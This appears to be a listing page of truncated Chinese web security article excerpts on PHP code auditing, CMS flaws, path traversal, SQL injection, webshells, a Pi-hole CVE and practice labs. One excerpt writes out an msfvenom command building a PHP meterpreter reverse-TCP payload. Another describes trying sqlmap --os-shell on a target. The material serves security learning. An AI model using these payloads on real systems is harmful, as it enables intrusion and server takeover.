一、漏洞简介 二、漏洞影响 三、复现过程 代码分析 安装漏洞 其实一般代码审计都是从安装文件开始审计，一般安装脚本主要存在如下漏洞： 无验证功能，任意重装覆盖 表单不做过滤写入config.php导致getshell $_GET['step']跳过限制步骤 漏洞文件：install.php 首先我们直奔第一个点能否任意重装，我们可以看到必须常量DEL_INSTALLER为1的时候才会触发删除install.php,那么我们追踪DEL_INSTALLER看看 这里可以看到DEL_INSTALLER默认值就是...

前言  本文章主要是PHP代码审计的一些基础知识，包括函数的用法，漏洞点，偏向基础部分，个人能力有限，部分可能会出现错误或者遗漏，读者可自行补充。 代码执行 # 代码执行是代码审计当中较为严重的漏洞，主要是一些命令执行函数的不适当使用。那么，常见的能够触发这类漏洞的函数有哪些呢？ eval() # 想必大家对eval()函数应该并不陌生，简而言之eval()函数就是将传入的字符串当作 PHP 代码来进行执行。 eval( string $code) : mixed 1 ...

简介：¶ 很多网站由于业务需求，会给用户提供一些文件下载的地方，例如一些附件下载的地方，如果此时文件下载是通过路径的方式提供下载，并且路径参数是前端提交数据包到后端的，那么恶意用户就可以修改路径从而下载服务器的一些敏感文件或者网站源码等，对服务器进行进一步的攻击 漏洞原理实例：¶ 某网站附件下载处存在如下链接： http://example.com/download.php?file=/uploadfile/test.pdf 如果这里没有对file参数做严格的过滤，并且在配置文件中限制文件的访问范围，那么用户可以通过修改file参数内容，回溯上级目...

前言 在渗透测试时，经常会遇到公开漏洞已经修复、只有一个登录框等情况，这时候如果能拿到代码进行审计一波，往往能打开一扇新的大门。 代码审计(Code Audit) 顾名思义就是通过阅读源代码，从中找出程序源代码中存在的缺陷或安全隐患，提前发现并解决风险，这在甲方的SDL建设中是很重要的一环。而在渗透测试中，可以通过代码审计挖掘程序漏洞，快速利用漏洞进行攻击，达成目标。 审计思路 常见的审计思路有： 1、寻找敏感功能点，通读功能点代码； 优点：精准定向挖掘，利用程度高； 缺点：命名不规范的代码容易被忽略，导致失去先机； ...

0x00 前言 天目MVC是天目网络科技有限公司开发的一款专业的PHP+MYSQL产品，采用自主MVC构架。 我们今天所通读的CMS为天目MVC，从了解框架运行原理到漏洞挖掘。 源码下载地址：https://www.a5xiazai.com/php/141613.html 官网下载渠道： 因为本篇文章涉及到前台漏洞，笔者已将漏洞信息提交给官网，官网已经更新并将漏洞修补。 我们还是老样子，整个故事从index.php开始说起。 0x01 MVC的了解 我们看一下index.php的整个结...

前言 seacms是一个代码审计入门级的cms，比较适合我这种小白玩家来学习，如果有什么错误欢迎指出。 环境 phpstudy pro php5.4.45nts seay代码审计工具 phpstrom sqlmap seacms v10.1 因为这个cms的官网已经打不开了，所以发一下自己保存的代码 链接https://pan.baidu.com/s/1f9mXyOX6sgsersyNz-kDQg提取码j3k0 安装c...

所谓“左移开发安全”就是在开发流程中的所有阶段都考虑到安全性问题，研发人员承担更多的软件安全责任。很多研发会认为考虑软件的安全性会给他们徒增更多工作量，但实际上安全能力是研发工作中锦上添花的东西，比如可以帮他们节约大量修复bug的时间。 靠单个产品修复所有的应用安全漏洞几乎不可能。开发安全需要在开发各个阶段实施不同的防御措施，层层递进地去实现。 开发安全类工具一般包括： SAST - 静态应用安全测试 DAST - 动态应用安全测试 IAST - 交互式应用安全测试 RASP - 运行时应用自我保...

前言 yxtcmf6.1是一个基于thinkphp3.2.3的cms，19年3月份发布，用来练习代码审计是个不错的选择。 审计思路 由于这个cms采用MVC架构并且是基于thinkphp3.2.3的，所以先了解文件结构，知道不同的页面对应的文件位置在哪。然后搭建一个tp3.2.3了解一下这个框架，百度找找这个框架的漏洞，再通过Seay全局搜索可能因为这个框架存在漏洞的关键词。接下来上自动审计（自动审计的规则并不是很完全，所以可以通过自己审计的经验添加规则或者上百度找一些规则），对自动审计的结果进行验证，结果可能会有几百上千条，虽然不用每一条都去看，但是也是比较需要耐心的。...

教程介绍 讲师结合自身的学习经验，设计了适合代码审计入门指导的课程《PHP代码审计实战》。在本课程中，第一二章系统的讲解代码审计入门的一些基础知识：代码审计环境的准备、代码审计的一般步骤、INI文件的安全配置、一些常见的危险函数、常用Web的漏洞类型、掌握相关审计工具的使用。第三章着重实战演示常用Web漏洞类型的代码审计过程。 学习地址 百度：https://pan.baidu.com/s/1uRx1En0QmrWnhHD_eUbU1A 天翼：https://cloud.189.cn/t/uUfAZ3YFBBZr 微云：https:/...

PS：练习利用这些网站，就会打破kali学的好，监狱进的早的魔咒了 进攻即是最好的防御，这句话同样适用于信息安全的世界。这里罗列了16个合法的来练习黑客技术的网站，不管你是一名开发人员、安全工程师、代码审计师、渗透 测试人员，通过不断的练习才能让你成为一个优秀安全研究人员。以下网站希望能给各位安全小伙伴带来帮助！（排名不分 先后） 1.bWAPP 免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。 ...

一、漏洞简介 通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。3月13日，通达OA在官方论坛发布通告称，近日接到用户反馈遭到勒索病毒攻击，攻击者通过构造恶意请求，上传webshell等恶意文件，并对入侵的服务器进行文件加密，勒索高额匿名货币赎金。笔者长期从事二进制漏洞的研究，写此文旨在学习web漏洞的研究方法并以此漏洞为实践，强化对web漏洞利用技术的认识，记录之。 二、漏洞分析 资料显示，该漏洞影响范围较广，影响的版本有：V11版、2017版、2016版...

前言 Webshell是网站入侵的常用后门，利用Webshell可以在Web服务器上执行系统命令、窃取数据等恶意操作，危害极大。Webshell因其隐秘性、基于脚本、灵活便捷、功能强大等特点，广受黑客们的喜爱，因此Webshell的检测也成为企业安全防御的重点，Webshell检测已是主机安全系统的标配功能。洋葱系统是腾讯自研的主机安全系统，Webshell检测是其基础功能之一，洋葱系统在2008年上线了第一代Webshell检测引擎，14年上线了动态检测功能（RASP）并在TSRC进行了众测，其后还增加了统计分析、机器学习等能力。2012年phpmyadmin某个分发节点被植入后门（CVE...

CVE-2020-8816是Pi-hole软件中的一个远程代码执行漏洞，Pi-hole是一个用于内容过滤的DNS服务器，也提供DHCP服务。这个软件提供一个Web界面，漏洞就存在于实现Web界面的源码中，影响版本在v4.3.2及其之前。 环境搭建(先看下面的“踩到的坑”) 环境：virtualbox6.1 + ubuntu18.04 + pi-hole v4.3.2 相关IP： 虚拟机NAT网卡，IP地址为：10.0.2.15 虚拟机桥接网卡，IP地址为：192.168.0.107 主机IP地址为：192.168...

一、找网站SQL注入点 在测试时后发现有一个信息查询框，就是下面这个图片显示的。一般信息查询框会和数据库存在交互。  我输入数字1，会正常提示木查询到相关信息。 那我们使用1′测试一下，发现不弹未查询到相关信息的提示框，也没有任何数据输出，大致判断这个点存在sql注入，并且不对输出报错信息。 大概猜测出SQL语句为 ：  select * from A where id ='$_POST['id']'; 没有对用户输入的数据做任何过滤。 构造一个闭合语句再次确认一些是否确认存在sql注入...

2019年2月在写这篇文章 挖掘暗藏ThinkPHP中的反序列利用链 , 寻找PHP反序列化的POP Chain时, 我就在想这种纯粹的体力劳动可不可以更现代化一点, 不仅仅是Ctrl+Shift+F这种机械重复的体力劳动, 当时了解了一些相关的项目/论文, 包括不限于Navex, Prvd, Cobra, Codeql. 鉴于Cobra代码开源, 也相对简单, 后来有一阵子某知名OA漏洞爆发, 于是参考了Cobra的PHP Parser尝试实现一个通过遍历Java AST(抽象语法树)进行漏洞挖掘的工具, 没想到效果出奇的好, 筛选出160个前台注...

前言 近日发现了一款有意思的PHP静态代码审计工具——Wpbullet。与其他PHP代码审计工具不同的是，Wpbullet是一款针对WordPress插件/主题开发的静态代码分析工具。 Wordpress自身代码尚且可以说很安全，但是其插件的安全却参差不齐，这款工具可以对WordPress、插件、主题进行静态代码初步的审计，方便后续的漏洞挖掘工作。 由于该工具的说明文档较少，我对其工作原理以及其检测能力比较好奇，因此这篇文章除了简单介绍一下这个工具如何使用之外，更重要的是分析Wpbuttle这块工具的源码，介绍一下它的检测思路。 工具安装 Wpbu...

利用模拟器安装好APP,然后进行BURP抓包分析 通过各种手工分析,找到某处SQL注入漏洞. 之前信息收集的时候已经知道目标开放1433端口(爆破失败) 因此注入的时候,直接 --dbms=mssql  加快速度. 注入点类型: SA权限的注入点,原谅我菜,目前还没找到后台地址,数据库实在太特么乱了,虽然只有几个数据表,但是我不想一个一个的去翻,直接读sa密码解密失败,行吧,尝试下--os-shell 结果如上图,告诉我不支持,那我们改下类型,指定跑 stack queries&...

进攻即是最好的防御，这句话同样适用于信息安全的世界。这里罗列了19个合法的来练习黑客技术的网站，不管你是一名开发人员、安全工程师、代码审计师、渗透测试人员，通过不断的练习才能让你成为一个优秀安全研究人员。以下网站希望能给各位安全小伙伴带来帮助！若有其他的补充和推荐，欢迎给小编留言（排名不分先后） 国外 1、bWAPP 免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。 地址：itsecgames 2、Damn Vulnerable iOS App (DVIA) DVIA是一个iOS安全的应用。它的主要目标给移动安全...

前言 近期面试喜欢问的问题，总结了一下。 岗位分析 整体安全行业，随着网络安全的大火，Web安全入门浅，培训机构遍地开会，大量花里胡哨的人才都争着用了进来，所以想要突出，必须要有自己的一技之长。 那么当前网络安全的技术岗位，热门方向有很多，说几个例子。 逆向 APT 代码审计 区块链 渗透（不限于内网、CS客户端，...

0×00 前言  其实没什么好说的，该cms不是主流的cms，但是感觉该cms是一篇很好的MVC框架的例子，故记录下来。给大家分享一下自己代码审计的经验。  Cms下载地址：http://www.mycodes.net/45/4324.htm  0×01 MVC框架的了解  首先我们需要对该cms进行通读代码，来具体了解一下该网站的结构，如何访问到某个模块，某个分支。否则就算我们挖到漏洞，也找不到利用点。  老样子，我们从 index.php 来进行代码审...

为了方便大家查缺补漏，避免学习过程出现知识盲点的情况，我专门写了这篇文章，因为内容比较多，不会对某个技术做详细的讲解，只会说明该掌握哪些知识点。 一、学习前必须掌握的基础知识 没有结实的地基建不了高楼，没有基础作为积淀提高不了技术，先掌握好基本知识才是王道。 1、计算机网络 想要了解网络通信的原理，绕不开OSI七层协议模型、TCP/IP四层模型，有了这些网络数据才得以传输。 2、网站运行原理 需要了解域名、服务器、cdn、数据库、端口、前端与后端的关系。 3、HTTP协议 需要了解报文格式、状态消息（即状态码）、https加密协议...

1、简介 Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。 2、使用metasploit linux提权 生成攻击载荷 msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.134 LPORT=12345 -f raw&n...

一、代码扫描的目标 网上关于代码扫描的介绍无一不是在推荐基于语法语义分析的代码扫描工具，典型的代表就是fortify、Checkmarx。总结起来观点无非是, 目前市面上有基于正则表达式和基于语义分析的两种检测方式，基于正则表达式的传统代码安全扫描方案的缺陷在于其无法很好的“理解”代码的语义，而是仅仅把代码文件当作纯字符串处理。静态扫描商用产品都运用了语义分析、语法分析等程序分析技术静态分析层负责对代码文件进行“理解”，完成语义、语法层面的分析。能进行完整数据流分析，通过分析污点传播进行漏洞判定。 之前也使用过fortify进行自动化代码扫描，由于误报率太高导致推送给业务方的漏洞代码...

一、关于php ini介绍 php.ini apache在启动时php.ini被读取。对于服务器模块版本的php，仅在web服务器启动时读取一次。对于CGI和CLI版本，每次调用都会被读取 Apache Web服务器在启动时会把目录转到根目录，这将使得PHP尝试在根目录下读取php.ini，如果·存在的话。在php.ini中可以使用环境变量 User.ini 自php5.3.0起，PHP支持基于每个目录的.htaccess风格的INI文件。此类文件仅被CGI/Fastcgi sapi处理。 php_ini_* ...

登录框系列最后一篇，半年的准全职赏金猎人的生涯，算是水到渠成的一篇，这一篇每一个类型都将配一个这半年来我所发现的漏洞当作案例。 0×00 文章内容结构图 0×01 管理后台隐藏的注册接口 很多系统的后台会用一些本身存在注册功能，但是在后续正式使用的时候，开发人员为了图省事，仅仅删除前端显示的操作。也就是说该系统注册接口仍然存在，只是你在客户端无法找到而已。 案例 这是某系统的管理后台，除了我们所看到的以及HTML源码，js代码均为发现其他有效接口。 此时，我手动将login修改为reg，没想到中奖了。 ...